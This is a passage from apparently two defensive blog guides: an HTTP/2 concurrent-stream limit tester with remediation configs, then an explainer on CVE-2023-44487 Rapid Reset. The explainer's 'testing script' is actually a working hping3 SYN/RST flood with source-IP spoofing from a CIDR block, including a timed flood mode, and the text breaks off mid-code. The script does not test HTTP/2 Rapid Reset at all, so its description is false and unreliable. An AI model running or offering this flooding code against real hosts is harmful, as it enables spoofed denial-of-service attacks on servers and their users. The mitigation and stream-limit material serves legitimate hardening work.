            if data_to_send:
                self.socket.sendall(data_to_send)

            self.active_streams[stream_id] = {
                'sent': time.time(),
                'ended': False,
                'reset': False
            }

            return True

        except ProtocolError as e:
            if self.verbose:
                print(f"  Stream {stream_id}: Protocol error - {e}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"  Stream {stream_id}: Failed to send - {e}")
            return False

    def test_concurrent_streams(
        self,
        max_streams_to_test: int = 200,
        batch_size: int = 10,
        delay_between_batches: float = 0.1
    ) -> StreamLimitTestResults:
        """
        Test maximum concurrent streams by opening multiple streams

        Args:
            max_streams_to_test: Maximum number of streams to attempt
            batch_size: Number of streams to open per batch
            delay_between_batches: Delay in seconds between batches
        """
        results = StreamLimitTestResults()
        start_time = time.time()

        print(f"\nTesting HTTP/2 Stream Limits:")
        print(f"  Target: {self.host}:{self.port}")
        print(f"  Max streams to test: {max_streams_to_test}")
        print(f"  Batch size: {batch_size}")
        print("=" * 60)

        try:
            # Connect and get initial settings
            if not self.connect():
                results.errors.append("Failed to establish connection")
                return results

            results.advertised_max_streams = self.server_max_streams

            if self.server_max_streams:
                print(f"\nServer advertised limit: {self.server_max_streams} concurrent streams")
            else:
                print(f"\nServer did not advertise MAX_CONCURRENT_STREAMS limit")

            # Start opening streams in batches
            stream_id = 1  # HTTP/2 client streams use odd numbers
            streams_opened = 0

            while streams_opened < max_streams_to_test:
                batch_count = min(batch_size, max_streams_to_test - streams_opened)

                print(f"\nOpening batch of {batch_count} streams (total: {streams_opened + batch_count})...")

                for _ in range(batch_count):
                    if self.send_stream_request(stream_id):
                        results.successful_streams += 1
                        streams_opened += 1
                    else:
                        results.failed_streams += 1

                    stream_id += 2  # Increment by 2 (odd numbers only)

                # Process any responses
                self._receive_data(timeout=0.5)

                # Check for resets
                reset_count = sum(1 for s in self.active_streams.values() if s.get('reset', False))
                if reset_count > results.reset_streams:
                    new_resets = reset_count - results.reset_streams
                    results.reset_streams = reset_count
                    print(f"  WARNING: {new_resets} stream(s) were reset by server")

                    # If we're getting lots of resets, enforcement is happening
                    if reset_count > (results.successful_streams * 0.1):
                        results.enforcement_detected = True
                        print(f"  Stream limit enforcement detected")

                # Small delay between batches
                if delay_between_batches > 0 and streams_opened < max_streams_to_test:
                    time.sleep(delay_between_batches)

            # Final data reception
            print(f"\nWaiting for final responses...")
            for _ in range(5):
                self._receive_data(timeout=1.0)

            # Calculate actual max streams achieved
            results.actual_max_streams = results.successful_streams - results.reset_streams

        except Exception as e:
            results.errors.append(f"Test error: {str(e)}")
            if self.verbose:
                import traceback
                traceback.print_exc()

        finally:
            results.test_duration = time.time() - start_time
            self.close()

        return results

    def display_results(self, results: StreamLimitTestResults):
        """Display test results"""
        print("\n" + "=" * 60)
        print("STREAM LIMIT TEST RESULTS")
        print("=" * 60)

        print(f"\nServer Configuration:")
        print(f"  Advertised max streams:  {results.advertised_max_streams or 'Not specified'}")

        print(f"\nTest Statistics:")
        print(f"  Successful stream opens: {results.successful_streams}")
        print(f"  Failed stream opens:     {results.failed_streams}")
        print(f"  Streams reset by server: {results.reset_streams}")
        print(f"  Actual max achieved:     {results.actual_max_streams}")
        print(f"  Test duration:           {results.test_duration:.2f}s")

        print(f"\nEnforcement:")
        if results.enforcement_detected:
            print(f"  Stream limit enforcement: DETECTED")
        else:
            print(f"  Stream limit enforcement: NOT DETECTED")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        # Provide recommendations
        if results.advertised_max_streams and results.advertised_max_streams > 128:
            print(f"\nWARNING: Advertised limit ({results.advertised_max_streams}) exceeds recommended maximum (128)")
            print("  Consider reducing http2_max_concurrent_streams")
        elif results.advertised_max_streams and results.advertised_max_streams <= 128:
            print(f"\nAdvertised limit ({results.advertised_max_streams}) is within recommended range")

        if not results.enforcement_detected and results.actual_max_streams > 150:
            print(f"\nWARNING: Opened {results.actual_max_streams} streams without enforcement")
            print("  Server may be vulnerable to stream exhaustion attacks")
        elif results.enforcement_detected:
            print(f"\nServer actively enforces stream limits")
            print("  Stream limit protection is working correctly")

        if results.errors:
            print(f"\nErrors encountered:")
            for error in results.errors:
                print(f"  {error}")

        print("=" * 60 + "\n")

    def close(self):
        """Close the connection"""
        try:
            if self.h2_conn:
                self.h2_conn.close_connection()
                if self.socket:
                    data_to_send = self.h2_conn.data_to_send()
                    if data_to_send:
                        self.socket.sendall(data_to_send)

            if self.socket:
                self.socket.close()

            if self.verbose:
                print("Connection closed")
        except Exception as e:
            if self.verbose:
                print(f"Error closing connection: {e}")


def main():
    parser = argparse.ArgumentParser(
        description='Test HTTP/2 server maximum concurrent streams',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test
  python3 http2_stream_limit_tester.py --host example.com

  # Test with custom parameters
  python3 http2_stream_limit_tester.py --host example.com --max-streams 300 --batch 20

  # Verbose output
  python3 http2_stream_limit_tester.py --host example.com --verbose

  # Test specific path
  python3 http2_stream_limit_tester.py --host example.com --path /api/health

  # Test non-TLS HTTP/2 (h2c)
  python3 http2_stream_limit_tester.py --host localhost --port 8080 --no-tls

Prerequisites:
  pip3 install h2 hyper --break-system-packages
        """
    )

    parser.add_argument('--host', required=True, help='Target hostname')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--path', default='/', help='Request path (default: /)')
    parser.add_argument('--no-tls', action='store_true', help='Disable TLS (for h2c testing)')
    parser.add_argument('--max-streams', type=int, default=200,
                       help='Maximum streams to test (default: 200)')
    parser.add_argument('--batch', type=int, default=10,
                       help='Streams per batch (default: 10)')
    parser.add_argument('--delay', type=float, default=0.1,
                       help='Delay between batches in seconds (default: 0.1)')
    parser.add_argument('--timeout', type=int, default=30,
                       help='Connection timeout in seconds (default: 30)')
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    print("=" * 60)
    print("HTTP/2 Maximum Concurrent Streams Tester")
    print("=" * 60)

    tester = HTTP2StreamLimitTester(
        host=args.host,
        port=args.port,
        path=args.path,
        use_tls=not args.no_tls,
        timeout=args.timeout,
        verbose=args.verbose
    )

    try:
        results = tester.test_concurrent_streams(
            max_streams_to_test=args.max_streams,
            batch_size=args.batch,
            delay_between_batches=args.delay
        )

        tester.display_results(results)

    except KeyboardInterrupt:
        print("\n\nTest interrupted by user")
    except Exception as e:
        print(f"\nFatal error: {e}")
        if args.verbose:
            import traceback
            traceback.print_exc()


if __name__ == '__main__':
    main()

5. Using the Script

5.1. Basic Usage

Test your server with default settings:

python3 http2_stream_limit_tester.py --host example.com

5.2. Advanced Examples

Test with increased stream count:

python3 http2_stream_limit_tester.py --host example.com --max-streams 300 --batch 20

Verbose output for debugging:

python3 http2_stream_limit_tester.py --host example.com --verbose

Test specific API endpoint:

python3 http2_stream_limit_tester.py --host api.example.com --path /v1/health

Test non-TLS HTTP/2 (h2c):

python3 http2_stream_limit_tester.py --host localhost --port 8080 --no-tls

Gradual escalation test:

# Start conservative
python3 http2_stream_limit_tester.py --host example.com --max-streams 50

# Increase if server handles well
python3 http2_stream_limit_tester.py --host example.com --max-streams 100

# Push to limits
python3 http2_stream_limit_tester.py --host example.com --max-streams 200

Fast burst test:

python3 http2_stream_limit_tester.py --host example.com --max-streams 150 --batch 30 --delay 0.01

Slow ramp test:

python3 http2_stream_limit_tester.py --host example.com --max-streams 200 --batch 5 --delay 0.5

6. Understanding the Results

The script provides detailed output including:

  1. Advertised max streams: What the server claims to support
  2. Successful stream opens: How many streams were successfully created
  3. Failed stream opens: Streams that failed to open
  4. Streams reset by server: Streams terminated by the server (enforcement)
  5. Actual max achieved: The real concurrent stream limit

6.1. Example Output

Testing HTTP/2 Stream Limits:
  Target: example.com:443
  Max streams to test: 200
  Batch size: 10
============================================================

Server advertised limit: 128 concurrent streams

Opening batch of 10 streams (total: 10)...
Opening batch of 10 streams (total: 20)...
Opening batch of 10 streams (total: 130)...
  WARNING: 5 stream(s) were reset by server
  Stream limit enforcement detected

============================================================
STREAM LIMIT TEST RESULTS
============================================================

Server Configuration:
  Advertised max streams:  128

Test Statistics:
  Successful stream opens: 130
  Failed stream opens:     0
  Streams reset by server: 5
  Actual max achieved:     125
  Test duration:           3.45s

Enforcement:
  Stream limit enforcement: DETECTED

============================================================
ASSESSMENT
============================================================

Advertised limit (128) is within recommended range
Server actively enforces stream limits
  Stream limit protection is working correctly
============================================================

7. Interpreting Different Scenarios

7.1. Scenario 1: Proper Enforcement

Advertised max streams:  100
Successful stream opens: 105
Streams reset by server: 5
Actual max achieved:     100
Stream limit enforcement: DETECTED

Analysis: Server properly enforces the limit. Configuration is working exactly as expected.

7.2. Scenario 2: No Enforcement

Advertised max streams:  128
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved:     200
Stream limit enforcement: NOT DETECTED

Analysis: Server accepts far more streams than advertised. This is a potential vulnerability that should be investigated.

7.3. Scenario 3: No Advertised Limit

Advertised max streams:  Not specified
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved:     200
Stream limit enforcement: NOT DETECTED

Analysis: Server does not advertise or enforce limits. High risk configuration that requires immediate remediation.

7.4. Scenario 4: Conservative Limit

Advertised max streams:  50
Successful stream opens: 55
Streams reset by server: 5
Actual max achieved:     50
Stream limit enforcement: DETECTED

Analysis: Very conservative limit. Good for security but may impact performance for legitimate high-throughput applications.

8. Monitoring During Testing

8.1. Server Side Monitoring

While running tests, monitor your server for resource utilization and connection metrics.

Monitor connection states:

netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

Count active connections:

netstat -an | grep ESTABLISHED | wc -l

Count SYN_RECV connections:

netstat -an | grep SYN_RECV | wc -l

Monitor system resources:

top -l 1 | head -10

8.2. Web Server Specific Monitoring

For Nginx, watch active connections:

watch -n 1 'curl -s http://localhost/nginx_status | grep Active'

For Apache, monitor server status:

watch -n 1 'curl -s http://localhost/server-status | grep requests'

Check HTTP/2 connections:

netstat -an | grep :443 | grep ESTABLISHED | wc -l

Monitor stream counts (if your server exposes this metric):

curl -s http://localhost:9090/metrics | grep http2_streams

Monitor CPU and memory:

top -l 1 | grep -E "CPU|PhysMem"

Check file descriptors:

lsof -i :443 | wc -l

8.3. Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

8.4. Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

9. Remediation Steps

If your tests reveal issues, apply these configuration fixes:

9.1. Nginx Configuration

http {
    # Set conservative concurrent stream limit
    http2_max_concurrent_streams 100;

    # Additional protections
    http2_recv_timeout 10s;
    http2_idle_timeout 30s;
    http2_max_field_size 16k;
    http2_max_header_size 32k;
}

9.2. Apache Configuration

Set in httpd.conf or virtual host configuration:

# Set maximum concurrent streams
H2MaxSessionStreams 100

# Additional HTTP/2 settings
H2StreamTimeout 10
H2MinWorkers 10
H2MaxWorkers 150
H2StreamMaxMemSize 65536

9.3. HAProxy Configuration

defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend fe_main
    bind :443 ssl crt /path/to/cert.pem alpn h2,http/1.1

    # Limit streams per connection
    http-request track-sc0 src table connection_limit
    http-request deny if { sc_conn_cur(0) gt 100 }

9.4. Envoy Configuration

static_resources:
  listeners:
  - name: listener_0
    address:
      socket_address:
        address: 0.0.0.0
        port_value: 443
    filter_chains:
    - filters:
      - name: envoy.filters.network.http_connection_manager
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
          http2_protocol_options:
            max_concurrent_streams: 100
            initial_stream_window_size: 65536
            initial_connection_window_size: 1048576

9.5. Caddy Configuration

example.com {
    encode gzip

    # HTTP/2 settings
    protocol {
        experimental_http3
        max_concurrent_streams 100
    }

    reverse_proxy localhost:8080
}

10. Combining with Rapid Reset Testing

You can use both the stream limit tester and the Rapid Reset tester together for comprehensive HTTP/2 security assessment:

# Step 1: Test stream limits
python3 http2_stream_limit_tester.py --host example.com

# Step 2: Test rapid reset with IP spoofing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 1000

# Step 3: Re-test stream limits to verify no degradation
python3 http2_stream_limit_tester.py --host example.com

11. Security Best Practices

11.1. Configuration Guidelines

  1. Set explicit limits: Never rely on default values
  2. Use conservative values: 100-128 streams is the recommended range
  3. Monitor enforcement: Regularly verify that limits are actually being enforced
  4. Document settings: Maintain records of your stream limit configuration
  5. Test after changes: Always test after configuration modifications

11.2. Defense in Depth

Stream limits should be one layer in a comprehensive security strategy:

  1. Stream limits: Prevent excessive concurrent streams per connection
  2. Connection limits: Limit total connections per IP address
  3. Request rate limiting: Throttle requests per second
  4. Resource quotas: Set memory and CPU limits
  5. WAF/DDoS protection: Use cloud-based or on-premise DDoS mitigation

11.3. Regular Testing Schedule

Establish a regular testing schedule:

  • Weekly: Automated basic stream limit tests
  • Monthly: Comprehensive security testing including Rapid Reset
  • After changes: Always test after configuration or infrastructure changes
  • Quarterly: Full security audit including penetration testing

12. Troubleshooting

12.1. Common Errors

Error: “SSL: CERTIFICATE_VERIFY_FAILED”

This occurs when testing against servers with self-signed certificates. For testing purposes only, you can modify the script to skip certificate verification (not recommended for production testing).

Error: “h2 library not installed”

Install the required library:

pip3 install h2 hyper --break-system-packages

Error: “Connection refused”

Verify the port is open:

telnet example.com 443

Check if HTTP/2 is enabled:

curl -I --http2 https://example.com

Error: “HTTP/2 not negotiated”

The server may not support HTTP/2. Verify with:

curl -I --http2 https://example.com | grep -i http/2

12.2. No Streams Being Reset

If streams are not being reset despite exceeding the advertised limit:

  • Server may not be enforcing limits properly
  • Configuration may not have been applied (restart required)
  • Server may be using a different enforcement mechanism
  • Limits may be set at a different layer (load balancer vs web server)

12.3. High Failure Rate

If many streams fail to open:

  • Network connectivity issues
  • Firewall blocking requests
  • Server resource exhaustion
  • Rate limiting triggering prematurely

13. Understanding the Attack Surface

When testing your infrastructure, consider all HTTP/2 endpoints:

  1. Web servers: Nginx, Apache, IIS
  2. Load balancers: HAProxy, Envoy, ALB
  3. API gateways: Kong, Tyk, AWS API Gateway
  4. CDN endpoints: CloudFlare, Fastly, Akamai
  5. Reverse proxies: Traefik, Caddy

13.1. Testing Strategy

Test at multiple layers:

# Test CDN edge
python3 http2_stream_limit_tester.py --host cdn.example.com

# Test load balancer directly
python3 http2_stream_limit_tester.py --host lb.example.com

# Test origin server
python3 http2_stream_limit_tester.py --host origin.example.com

14. Conclusion

Testing your HTTP/2 maximum concurrent streams configuration is essential for maintaining a secure and performant web infrastructure. This tool allows you to:

  • Verify that your server advertises appropriate stream limits
  • Confirm that advertised limits are actually enforced
  • Identify misconfigurations before they can be exploited
  • Tune performance while maintaining security

Regular testing, combined with proper configuration and monitoring, will help protect your infrastructure against HTTP/2-based attacks while maintaining optimal performance for legitimate users.

15. Additional Resources


This guide and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.

0
0

Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from a macOS

Introduction

In August 2023, a critical zero day vulnerability in the HTTP/2 protocol was disclosed that affected virtually every HTTP/2 capable web server and proxy. Known as HTTP/2 Rapid Reset (CVE 2023 44487), this vulnerability enabled attackers to launch devastating Distributed Denial of Service (DDoS) attacks with minimal resources. Google reported mitigating the largest DDoS attack ever recorded at the time (398 million requests per second) leveraging this technique.

Understanding this vulnerability and knowing how to test your infrastructure against it is crucial for maintaining a secure and resilient web presence. This guide provides a flexible testing tool specifically designed for macOS that uses hping3 for packet crafting with CIDR based source IP address spoofing capabilities.

What is HTTP/2 Rapid Reset?

The HTTP/2 Protocol Foundation

HTTP/2 introduced multiplexing, allowing multiple streams (requests/responses) to be sent concurrently over a single TCP connection. Each stream has a unique identifier and can be independently managed. To cancel a stream, HTTP/2 uses the RST_STREAM frame, which immediately terminates the stream and signals that no further processing is needed.

The Vulnerability Mechanism

The HTTP/2 Rapid Reset attack exploits the asymmetry between client cost and server cost:

  • Client cost: Sending a request followed immediately by a RST_STREAM frame is computationally trivial
  • Server cost: Processing the incoming request (parsing headers, routing, backend queries) consumes significant resources before the cancellation is received

An attacker can:

  1. Open an HTTP/2 connection
  2. Send thousands of requests with incrementing stream IDs
  3. Immediately cancel each request with RST_STREAM frames
  4. Repeat this cycle at extremely high rates

The server receives these requests and begins processing them. Even though the cancellation arrives milliseconds later, the server has already invested CPU, memory, and I/O resources. By sending millions of request cancel pairs per second, attackers can exhaust server resources with minimal bandwidth.

Why It’s So Effective

Traditional rate limiting and DDoS mitigation techniques struggle against Rapid Reset attacks because:

  • Low bandwidth usage: The attack uses minimal data (mostly HTTP/2 frames with small headers)
  • Valid protocol behavior: RST_STREAM is a legitimate HTTP/2 mechanism
  • Connection reuse: Attackers multiplex thousands of streams over relatively few connections
  • Amplification: Each cheap client operation triggers expensive server side processing

How to Guard Against HTTP/2 Rapid Reset

1. Update Your Software Stack

Immediate Priority: Ensure all HTTP/2 capable components are patched:

Web Servers:

  • Nginx 1.25.2+ or 1.24.1+
  • Apache HTTP Server 2.4.58+
  • Caddy 2.7.4+
  • LiteSpeed 6.0.12+

Reverse Proxies and Load Balancers:

  • HAProxy 2.8.2+ or 2.6.15+
  • Envoy 1.27.0+
  • Traefik 2.10.5+

CDN and Cloud Services:

  • CloudFlare (auto patched August 2023)
  • AWS ALB/CloudFront (patched)
  • Azure Front Door (patched)
  • Google Cloud Load Balancer (patched)

Application Servers:

  • Tomcat 10.1.13+, 9.0.80+
  • Jetty 12.0.1+, 11.0.16+, 10.0.16+
  • Node.js 20.8.0+, 18.18.0+

2. Implement Stream Limits

Configure strict limits on HTTP/2 stream behavior:

# Nginx configuration
http2_max_concurrent_streams 128;
http2_recv_timeout 10s;
# Apache HTTP Server
H2MaxSessionStreams 100
H2StreamTimeout 10
# HAProxy configuration
defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend https-in
    option http-use-htx
    http-request track-sc0 src
    http-request deny if { sc_http_req_rate(0) gt 100 }

3. Deploy Rate Limiting

Implement multi layered rate limiting:

Connection level limits:

limit_conn_zone $binary_remote_addr zone=addr:10m;
limit_conn addr 10;  # Max 10 concurrent connections per IP

Request level limits:

limit_req_zone $binary_remote_addr zone=req_limit:10m rate=50r/s;
limit_req zone=req_limit burst=20 nodelay;

Stream cancellation tracking:

# Newer Nginx versions track RST_STREAM rates
http2_max_concurrent_streams 100;
http2_max_field_size 16k;
http2_max_header_size 32k;

4. Infrastructure Level Protections

Use a WAF or DDoS Protection Service:

  • CloudFlare (includes Rapid Reset protection)
  • AWS Shield Advanced
  • Azure DDoS Protection Standard
  • Imperva/Akamai

Enable Connection Draining:

# Gracefully handle connection resets
http2_recv_buffer_size 256k;
keepalive_timeout 60s;
keepalive_requests 100;

5. Monitoring and Alerting

Track critical metrics:

  • HTTP/2 stream reset rates
  • Concurrent stream counts per connection
  • Request cancellation patterns
  • CPU and memory usage spikes
  • Unusual traffic patterns from specific IPs

Example Prometheus query:

rate(nginx_http_requests_total{status="499"}[5m]) > 100

6. Consider HTTP/2 Disabling (Temporary Measure)

If you cannot immediately patch:

# Nginx: Disable HTTP/2 temporarily
listen 443 ssl;  # Remove http2 parameter
# Apache: Disable HTTP/2 module
# a2dismod http2

Note: This reduces performance benefits but eliminates the vulnerability.

Testing Script for HTTP/2 Rapid Reset Vulnerabilities on macOS

Below is a parameterized Python script that tests your web servers using hping3 for packet crafting. This script is specifically optimized for macOS and can spoof source IP addresses from a CIDR block to simulate distributed attacks. Using hping3 ensures IP spoofing works consistently across different network environments.

Prerequisites for macOS

Installation Steps:

# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install hping3
brew install hping

Note: This script requires root/sudo privileges for packet crafting and IP spoofing.

The Testing Script

cat > http2rapidresettester_macos.py << 'EOF'

#!/usr/bin/env python3
"""
HTTP/2 Rapid Reset Vulnerability Tester for macOS
Tests web servers for susceptibility to CVE-2023-44487
Uses hping3 for packet crafting with source IP spoofing from CIDR block

Usage:
    sudo python3 http2rapidresettester_macos.py --host example.com --port 443 --cidr 192.168.1.0/24 --packets 1000

Requirements:
    brew install hping
"""

import argparse
import subprocess
import random
import ipaddress
import time
import sys
import os
import platform
from typing import List, Optional

class HTTP2RapidResetTester:
    def __init__(
        self,
        host: str,
        port: int = 443,
        cidr_block: str = None,
        timeout: int = 30,
        verbose: bool = False,
        interface: str = None
    ):
        self.host = host
        self.port = port
        self.cidr_block = cidr_block
        self.timeout = timeout
        self.verbose = verbose
        self.interface = interface
        self.source_ips: List[str] = []

        # Verify running on macOS
        if platform.system() != 'Darwin':
            print("WARNING: This script is optimized for macOS")

        if not self.check_hping3():
            raise RuntimeError("hping3 is not installed. Install with: brew install hping")

        if not self.check_root():
            raise RuntimeError("This script requires root privileges (use sudo)")

        if cidr_block:
            self.generate_source_ips()
            
        if interface:
            self.verify_interface()

    def check_hping3(self) -> bool:
        """Check if hping3 is installed"""
        try:
            result = subprocess.run(
                ['which', 'hping3'],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode == 0:
                return True

            # Try alternative hping command
            result = subprocess.run(
                ['which', 'hping'],
                capture_output=True,
                text=True,
                timeout=5
            )
            return result.returncode == 0
        except Exception as e:
            print(f"Error checking for hping3: {e}")
            return False

    def check_root(self) -> bool:
        """Check if running with root privileges"""
        return os.geteuid() == 0

    def verify_interface(self):
        """Verify that the specified network interface exists"""
        try:
            result = subprocess.run(
                ['ifconfig', self.interface],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode != 0:
                raise RuntimeError(f"Network interface '{self.interface}' not found")
            
            if self.verbose:
                print(f"Using network interface: {self.interface}")
                
        except subprocess.TimeoutExpired:
            raise RuntimeError(f"Timeout verifying interface '{self.interface}'")
        except FileNotFoundError:
            raise RuntimeError("ifconfig command not found")

    def generate_source_ips(self):
        """Generate list of IP addresses from CIDR block"""
        try:
            network = ipaddress.ip_network(self.cidr_block, strict=False)
            self.source_ips = [str(ip) for ip in network.hosts()]

            if len(self.source_ips) == 0:
                # Handle /32 or /31 networks
                self.source_ips = [str(ip) for ip in network]

            print(f"Generated {len(self.source_ips)} source IPs from {self.cidr_block}")

        except ValueError as e:
            print(f"Invalid CIDR block: {e}")
            sys.exit(1)

    def get_random_source_ip(self) -> Optional[str]:
        """Get a random IP address from the CIDR block"""
        if not self.source_ips:
            return None
        return random.choice(self.source_ips)

    def get_hping_command(self) -> str:
        """Determine which hping command is available"""
        result = subprocess.run(['which', 'hping3'], capture_output=True, text=True)
        if result.returncode == 0:
            return 'hping3'
        return 'hping'

    def craft_syn_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP SYN packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-S',  # SYN flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting SYN packet: {e}")
            return False

    def craft_rst_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP RST packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-R',  # RST flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting RST packet: {e}")
            return False

    def rapid_reset_test(
        self,
        num_packets: int,
        packets_per_ip: int = 10,
        reset_ratio: float = 1.0,
        delay_between_bursts: float = 0.01
    ) -> dict:
        """
        Perform rapid reset attack simulation

        Args:
            num_packets: Total number of packets to send
            packets_per_ip: Number of packets per source IP before switching
            reset_ratio: Ratio of RST packets to SYN packets (1.0 = equal)
            delay_between_bursts: Delay between packet bursts in seconds

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None
        }

        print(f"\nStarting HTTP/2 Rapid Reset test:")
        print(f"   Total packets: {num_packets}")
        print(f"   Packets per source IP: {packets_per_ip}")
        print(f"   RST to SYN ratio: {reset_ratio}")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
            print(f"   Available source IPs: {len(self.source_ips)}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        used_ips = set()
        packets_sent = 0
        current_ip_packets = 0
        current_source_ip = self.get_random_source_ip()

        if current_source_ip:
            used_ips.add(current_source_ip)

        try:
            while packets_sent < num_packets:
                # Switch to new source IP if needed
                if current_ip_packets >= packets_per_ip and self.source_ips:
                    current_source_ip = self.get_random_source_ip()
                    used_ips.add(current_source_ip)
                    current_ip_packets = 0

                # Send SYN packet
                if self.craft_syn_packet(current_source_ip, count=1):
                    results['syn_packets'] += 1
                    results['total_packets'] += 1
                    packets_sent += 1
                    current_ip_packets += 1
                else:
                    results['failed_packets'] += 1

                # Send RST packet based on ratio
                if random.random() < reset_ratio:
                    if self.craft_rst_packet(current_source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                        packets_sent += 1
                        current_ip_packets += 1
                    else:
                        results['failed_packets'] += 1

                # Progress indicator
                if packets_sent % 100 == 0:
                    elapsed = time.time() - results['start_time']
                    rate = packets_sent / elapsed if elapsed > 0 else 0
                    print(f"Progress: {packets_sent}/{num_packets} packets "
                          f"({rate:.0f} pps) | "
                          f"Unique IPs: {len(used_ips)}")

                # Small delay between bursts
                if delay_between_bursts > 0:
                    time.sleep(delay_between_bursts)

        except KeyboardInterrupt:
            print("\nTest interrupted by user")
        except Exception as e:
            print(f"\nTest error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def flood_mode(
        self,
        duration: int = 60,
        packet_rate: int = 1000
    ) -> dict:
        """
        Perform continuous flood attack for specified duration

        Args:
            duration: Duration of the flood in seconds
            packet_rate: Target packet rate per second

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None,
            'duration': duration
        }

        print(f"\nStarting flood mode:")
        print(f"   Duration: {duration} seconds")
        print(f"   Target rate: {packet_rate} packets/second")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        end_time = time.time() + duration
        used_ips = set()

        try:
            while time.time() < end_time:
                batch_start = time.time()

                # Send batch of packets
                for _ in range(packet_rate // 10):  # Batch in 0.1s intervals
                    source_ip = self.get_random_source_ip()
                    if source_ip:
                        used_ips.add(source_ip)

                    # Send SYN
                    if self.craft_syn_packet(source_ip, count=1):
                        results['syn_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                    # Send RST
                    if self.craft_rst_packet(source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                # Rate limiting
                batch_duration = time.time() - batch_start
                sleep_time = 0.1 - batch_duration
                if sleep_time > 0:
                    time.sleep(sleep_time)

                # Progress update
                elapsed = time.time() - results['start_time']
                remaining = end_time - time.time()
                rate = results['total_packets'] / elapsed if elapsed > 0 else 0

                print(f"Elapsed: {elapsed:.1f}s | Remaining: {remaining:.1f}s | "
                      f"Rate: {rate:.0f} pps | Total: {results['total_packets']}")

        except KeyboardInterrupt:
            print("\nFlood interrupted by user")
        except Exception as e:
            print(f"\nFlood error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def display_results(self, results: dict):
        """Display test results in a readable format"""
        duration = results['end_time'] - results['start_time']

        print("\n" + "=" * 60)
        print("TEST RESULTS")
        print("=" * 60)
        print(f"Total packets sent:      {results['total_packets']}")
        print(f"SYN packets:             {results['syn_packets']}")
        print(f"RST packets:             {results['rst_packets']}")
        print(f"Failed packets:          {results['failed_packets']}")
        print(f"Unique source IPs used:  {results['unique_source_ips']}")
        print(f"Test duration:           {duration:.2f}s")

        if duration > 0:
